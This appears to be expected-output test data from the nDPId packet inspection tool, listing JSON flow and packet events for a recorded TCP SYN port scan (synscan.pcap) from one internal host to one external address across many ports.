-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"synscan.pcap","alias":"nDPId-test","flow_id":423,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsBGsAACsGGQisEAAIQA2GNIzSJXndUoMYAAAAAGACEAADFgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":430,"source":"synscan.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"synscan.pcap","alias":"nDPId-test","flow_id":424,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsvYYAACoGYOysEAAIQA2GNIzSBH\/dUoMYAAAAAGACDAAoEAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":431,"source":"synscan.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4224,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"synscan.pcap","alias":"nDPId-test","flow_id":425,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAstjcAADAGYjusEAAIQA2GNIzSEIDdUoMYAAAAAGACBAAkDwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":432,"source":"synscan.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"synscan.pcap","alias":"nDPId-test","flow_id":426,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsMg4AACoG7GSsEAAIQA2GNIzSwBjdUoMYAAAAAGACDABsdgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":433,"source":"synscan.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"synscan.pcap","alias":"nDPId-test","flow_id":427,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsVwMAACwGxW+sEAAIQA2GNIzSH0DdUoMYAAAAAGACBAAVTwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":434,"source":"synscan.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"synscan.pcap","alias":"nDPId-test","flow_id":428,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAstAkAAC0GZ2msEAAIQA2GNIzSBAPdUoMYAAAAAGACCAAsjAAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"synscan.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"synscan.pcap","alias":"nDPId-test","flow_id":429,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsTbQAACwGzr6sEAAIQA2GNIzSAB7dUoMYAAAAAGACBAA0cQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":436,"source":"synscan.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"synscan.pcap","alias":"nDPId-test","flow_id":430,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAs1cgAADkGOaqsEAAIQA2GNIzSFrPdUoMYAAAAAGACCAAZ3AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":437,"source":"synscan.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"synscan.pcap","alias":"nDPId-test","flow_id":431,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsDeoAACgGEomsEAAIQA2GNIzSCNTdUoMYAAAAAGACBAAruwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":438,"source":"synscan.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1461,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":438,"source":"synscan.pcap","alias":"nDPId-test","flow_id":432,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsv0UAACgGYS2sEAAIQA2GNIzSBbXdUoMYAAAAAGACBAAu2gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"synscan.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"synscan.pcap","alias":"nDPId-test","flow_id":433,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsi\/0AADYGhnWsEAAIQA2GNIzSC7jdUoMYAAAAAGACDAAg1wAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"synscan.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":60443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"synscan.pcap","alias":"nDPId-test","flow_id":434,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsQLUAACgG372sEAAIQA2GNIzS7BvdUoMYAAAAAGACBABIcwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":441,"source":"synscan.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"synscan.pcap","alias":"nDPId-test","flow_id":435,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsPLgAADAG27qsEAAIQA2GNIzSINDdUoMYAAAAAGACBAATvwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":442,"source":"synscan.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32785,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"synscan.pcap","alias":"nDPId-test","flow_id":436,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsq9EAAC0Gb6GsEAAIQA2GNIzSgBHdUoMYAAAAAGACCACwfQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":443,"source":"synscan.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"synscan.pcap","alias":"nDPId-test","flow_id":437,"flow_packet_id":1,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059030,"pkt":"ACYLMQczACWzv5HuCABFAAAsj8YAACsGjaysEAAIQA2GNIzSI5bdUoMYAAAAAGACEAAE+QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"synscan.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"synscan.pcap","alias":"nDPId-test","flow_id":438,"flow_packet_id":1,"flow_last_seen":1278275059031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059031,"pkt":"ACYLMQczACWzv5HuCABFAAAs2tkAADEGPJmsEAAIQA2GNIzSFFDdUoMYAAAAAGACCAAcPwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"synscan.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"synscan.pcap","alias":"nDPId-test","flow_id":439,"flow_packet_id":1,"flow_last_seen":1278275059031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059031,"pkt":"ACYLMQczACWzv5HuCABFAAAsF\/IAADsG9YCsEAAIQA2GNIzSBBjdUoMYAAAAAGACEAAkdwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":446,"source":"synscan.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1688,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"synscan.pcap","alias":"nDPId-test","flow_id":440,"flow_packet_id":1,"flow_last_seen":1278275059031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059031,"pkt":"ACYLMQczACWzv5HuCABFAAAsowcAADcGbmusEAAIQA2GNIzSBpjdUoMYAAAAAGACEAAh9wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":447,"source":"synscan.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4224,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"synscan.pcap","alias":"nDPId-test","flow_id":441,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsaSUAADEGrk2sEAAIQA2GNIzTEIDdU4MZAAAAAGACCAAgDAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":448,"source":"synscan.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"synscan.pcap","alias":"nDPId-test","flow_id":442,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsv7UAADEGV72sEAAIQA2GNIzTBH\/dU4MZAAAAAGACCAAsDQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":449,"source":"synscan.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"synscan.pcap","alias":"nDPId-test","flow_id":443,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsxvMAACgGWX+sEAAIQA2GNIzTJXndU4MZAAAAAGACBAAPEwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":450,"source":"synscan.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"synscan.pcap","alias":"nDPId-test","flow_id":444,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsgk8AADsGiyOsEAAIQA2GNIzTBEndU4MZAAAAAGACEAAkQwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"synscan.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"synscan.pcap","alias":"nDPId-test","flow_id":445,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/uEAAC4GG5GsEAAIQA2GNIzTJxndU4MZAAAAAGACDAAFcwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":452,"source":"synscan.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":452,"source":"synscan.pcap","alias":"nDPId-test","flow_id":446,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsxT8AACsGWDOsEAAIQA2GNIzTDsjdU4MZAAAAAGACEAAZxAAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":453,"source":"synscan.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":453,"source":"synscan.pcap","alias":"nDPId-test","flow_id":447,"flow_packet_id":1,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059095,"pkt":"ACYLMQczACWzv5HuCABFAAAsxeYAADUGTYysEAAIQA2GNIzTAP7dU4MZAAAAAGACCAAvjgAAAgQFtA=="} 